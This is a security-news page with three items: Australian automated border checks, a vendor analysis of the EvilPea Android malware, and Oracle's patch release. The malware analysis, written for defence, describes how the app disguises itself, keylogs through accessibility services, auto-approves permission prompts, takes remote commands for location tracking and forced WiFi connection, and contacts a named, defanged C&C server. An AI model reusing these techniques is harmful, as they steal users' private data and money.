消息称,澳大利亚政府预计系统普及后,可于 2020 年前自动处理高达 9 成的游客入境检查。澳政府发言人表示,自动化入境程序便利旅客,并有助边境部门应对旅客数目增加带来的挑战,集中资源辨识具威胁的入境人士。此次计划是澳政府前年公布“无缝游客入境计划”的重要阶段,预计未来 5 年耗资 9400 万澳元推动。在新计划下,机场将逐步弃用现有的电子闸门,游客毋需再经过电子闸门扫描护照,也不用边境人员人手检查入境者护照。

澳边境安全主管科因解释,相关系统是全球首例,由于近年机票详情、游客出入境、犯罪记录等乘客数据在全球流通,他们得以利用相关大数据设计自动入境程序。

稿源:cnBeta?节选;封面:百度搜索0day

国内某知名应用市场遭仿冒,EvilPea病毒也玩起O2O

近期, 某社交应用正式推出了LBS+AR天降红包,用户需要在指定地理位置开启摄像头,就能抢到对应的红包,这种线上结合线下抢红包的模式称为O2O(online to offline)抢红包。

近两年O2O火爆整个互联网圈,各类O2O产品服务层出不穷,比如O2O美甲、O2O剃须、O2O理发,甚至你想洗脚,都有人上门给你服务!

不料,病毒开发者也来蹭O2O的热点,将线上攻击与线下攻击结合,为感染用户提供“上门服务”……

近期,安天AVL移动安全团队和小米MIUI捕获了一类恶意程序EvilPea,该恶意程序图标和名称与某知名应用市场完全一致,运行后弹出“程序不完整,需要重新安装”的提示框。

用户点击重新安装后,该恶意程序会在用户手机上安装一个真正的应用,以迷惑用户,自身则隐藏图标潜伏在手机中,后续进行如下恶意行为:

  • 诱导用户开启辅助功能,窃取指定APP的用户键盘操作记录
  • 窃取用户短信内容和联系人信息
  • 频繁监控用户地理位置
  • 主动连接指定WiFi
  • 后台私自进行屏幕截图并上传
  • 私自发送、拦截短信

结合其频繁窃取用户地理位置和主动连接指定WiFi两个行为,我们推测该病毒除了潜伏在手机中进行线上的恶意行为之外,极有可能线下通过WiFi攻击目标手机,窃取用户隐私,侵犯用户财产安全。

病毒运行流程图

00

病毒行为详细分析

step1 潜伏到用户手机

EvilPea恶意程序安装启动后会解析assets目录下tips中的数据,根据用户手机系统语言分别使用英文或者中文向用户提示“验矫程序时发现程序不完整,需要重新安装,是否进行重新安装?”(如下图所示),当用户点击“确定”后将assets目录下的qu.apk复制到手机储存卡并进行安装,若用户选择“取消”,该病毒则直接隐藏图标继续在后台运行,从而达到潜伏的目的。

1_副本

tips中的提示数据:

2

资源文件中的qu.apk:

3

根据是否有root权限进行提示安装或静默安装:
4

5

step2 窃取键盘记录

EvilPea恶意程序通过伪装成内存清理服务,诱导用户开启辅助服务,以便监听特定应用的键盘操作记录。同时对于弹出的“是否授予root权限”、“是否允许读取短信”等确认框,自动点击确认框中的“授权”、“允许”等关键字的按钮,并勾选关键字“不再提醒”的复选框。
6

7

自动点击按钮和勾选复选框的关键字:

8

监听指定app的键盘记录并保存:

9

step3 基于Droid Plugin插件机制,利用插件实施恶意行为

一、Droid Plugin简述

DroidPlugin是Android的一种开源插件机制,它可以在无需安装、修改的情况下运行APK文件。插件APK可以独立安装运行,也可以作为插件运行。该恶意程序使用这种插件机制启动各个恶意子包,子包间通过协同的方式完成远控及窃取用户隐私的行为,这样可以避免在插件安装过程中被杀软检测的情况,保证自身长期潜伏在感染终端中。

二、加载插件

EvilPea恶意程序将资源文件夹Assets/init/目录下的插件复制到SD卡/ .plugin/目录下,然后加载启动这些插件;其还会通过DES解密资源文件夹Resources/raw/config.txt中的数据得到联网地址hxxp://1519j010g4.iok.la:8088/dmrcandroid/,该网址是恶意程序所有数据传输的通道。

复制插件到指定目录下:

10

三、远程控制

1、获取远程控制指令

EvilPea恶意程序通过插件p_1477636923078.apk从服务器上获取远程控制指令并保存在数据库中:11

将指令数据通过ContentProvider保存在指定数据库内:

12

解密后的指令数据:

13

指令字段说明:01 (2)

2、远程控制行为:窃取用户地理位置信息

当接收到远控指令“locat”、“conlocat”时,EvilPea病毒程序开始窃取用户位置信息。指令为“locat”时窃取用户当前位置信息一次,指令为“conlocat”时持续不断地进行用户位置信息窃取。

持续窃取用户位置信息时,指令参数times表示从当前时间开始窃取的时长,interval表示每次窃取位置信息的间隔时间。14

15

3、远程控制行为:连接指定WiFi热点

EvilPea病毒程序通过远程指令“connect”获取指定WiFi的ssid,pwd和encript,其中ssid为WiFi连接标识,pwd为WiFi连接密码,encript为WiFi使用的加密方式:16

根据获取的数据配置WifiConfiguration:
18

联想到该病毒窃取用户地理位置的行为,我们推测该病毒能够配合线下WiFi攻击手段发起进一步攻击:根据感染用户的地理位置确认可攻击目标,在目标附近搭建恶意WiFi并强制目标手机连接,后续通过WiFi攻击进一步窃取用户的隐私信息,如社交账号、邮箱密码、银行账户等。

19

四、其他插件的功能列表

011

总结

EvilPea恶意程序伪装成知名应用,诱导用户进行下载安装,在恶意程序安装运行后,将引导用户安装正常应用,自身则隐藏图标潜伏在后台继续运行。后续该恶意程序利用DroidPlugin插件机制实施恶意行为,包括窃取用户短信、获取用户地理位置、连接指定WiFi、屏幕截图等,这些恶意行为本身不会直接造成感染用户的经济损失,但是这些恶意行为结合键盘记录,可以大量窃取用户隐私信息,如支付账号密码、短信验证码等,同时可以基于地理位置配合线下WiFi攻击手段对终端实施进一步攻击,窃取用户隐私信息,最终可能会给感染用户造成巨大的财产损失。

近几年伴随着黑产者与安全厂商的对抗持续升级,Android病毒攻击方式也在持续不断地进行更新迭代。早期的Android病毒主要通过向手机用户发送运营商扣费短信的方式盈利,攻击方式和获利途径较直接;后期由于安全厂商防护技术的升级,直接发送扣费短信的病毒在前端生存空间逐渐压缩,同时随着移动支付方式兴起,Android病毒转向更隐蔽地窃取移动支付相关的隐私信息,结合线下电信诈骗等其他手段,对受害者造成更大损害。

安全建议

针对EvilPea病毒,集成AVL移动反病毒引擎的MIUI安全中心已经实现全面查杀。安天AVL移动安全团队和MIUI安全中心提醒您:

  • 请从正规的应用市场下载应用,不要在不知名网站、论坛、应用市场下载应用;
  • 警惕手机中异常提示信息,不要随意赋予应用特殊权限;
  • 公共WiFi,尤其是无密码WiFi,请谨慎连接,避免遭受WiFi攻击;
  • 请使用WiFi检测工具对您连接的WiFi进行安全性检测,全面保护您的上网安全。

附录

Ioc

样本Hash: 74557CD0EC14FFACCC8962E141C7E7BD
C&C: hxxp://1519j010g4[.]iok[.]la:8088/dmrcandroid/

安天移动安全公司成立于2010年,是安天实验室旗下专注于移动互联网安全技术与安全产品研发的企业,旨在为全球移动终端用户和厂商提供专业的安全防护能力和解决方案。

安天移动安全公司核心产品体系为AVL Inside移动反病毒引擎和AVL Insight移动威胁情报平台。AVL Inside曾以年度最高平均检出率荣获国际权威测评机构AV-TEST颁发的“移动设备最佳防护”奖项,实现中国安全厂商在全球顶级安全测评领域重量级奖项零的突破。AVL Insight是国内首个移动威胁情报大数据平台,主要用于呈现移动威胁的高价值情报信息,通过对移动威胁的全面感知能力和快速分析响应能力,提供对抗移动威胁的预警和处置策略。

安天移动安全公司与国家互联网应急中心和泰尔终端实验室进行合作,为国家监管部门提供技术支撑;与OPPO、VIVO、小米MIUI、金立、阿里YunOS、步步高、努比亚、乐视、猎豹、LBE、安卓清理大师、AMC等国内外50多家知名厂商建立合作,为全球6亿终端用户保驾护航。

转载请注明来源:安全脉搏0day

Oracle修补了业务应用程序中的大量漏洞

Oracle今年发布了第一批安全补丁,修复了270个漏洞,主要用于关键业务应用程序。许多缺陷可以远程利用而无需身份验证。

大多数修复是针对Oracle电子商务套件,Oracle融合中间件,Oracle PeopleSoft,Oracle零售应用,Oracle JD Edwards,Oracle供应链产品和Oracle数据库服务器等业务产品中的缺陷。

电子商务套件被公司用于存储关键数据和管理广泛的业务流程,占40%的补丁漏洞,其中118个可远程利用,最高评级的在常见漏洞评分系统中得分为9.2(至关重要)。

另外37个漏洞在Oracle Financial Services中修补,18个在Oracle融合中间件中修补,8个在Oracle零售应用中修补,8个在Oracle PeopleSoft和4个在Oracle Primavera产品套件中修补。这些产品用于各种行业。

最关键的漏洞,CVSS评分为10,在Primavera P6企业项目组合管理中进行了修补。可以通过HTTP利用漏洞,并可能导致未经授权的关键数据的创建,删除或修改。

Oracle WebLogic Server,PeopleSoft Enterprise PeopleTools,JD Edwards EnterpriseOne工具和企业管理器基础平台中的CVSS分数为9.8,漏洞是固定的。如果不进行修补,这些可能导致受影响系统完全损害。

在数据库方面,在广泛使用的MySQL数据库服务器中修补了27个漏洞,在Oracle数据库服务器和相关组件中修补了5个漏洞。Java中已经修复了17个漏洞。

这不是Oracle迄今为止最大的重要补丁更新,早在2016年7月就有276项修复了。

来自网络安全公司ERPS的分析师指出,超过200个补丁的Oracle已经成为常态。对每个Oracle修复在2015年的平均数量为153。

Oracle按季度发布,下一个计划于4月18日发布更新。0day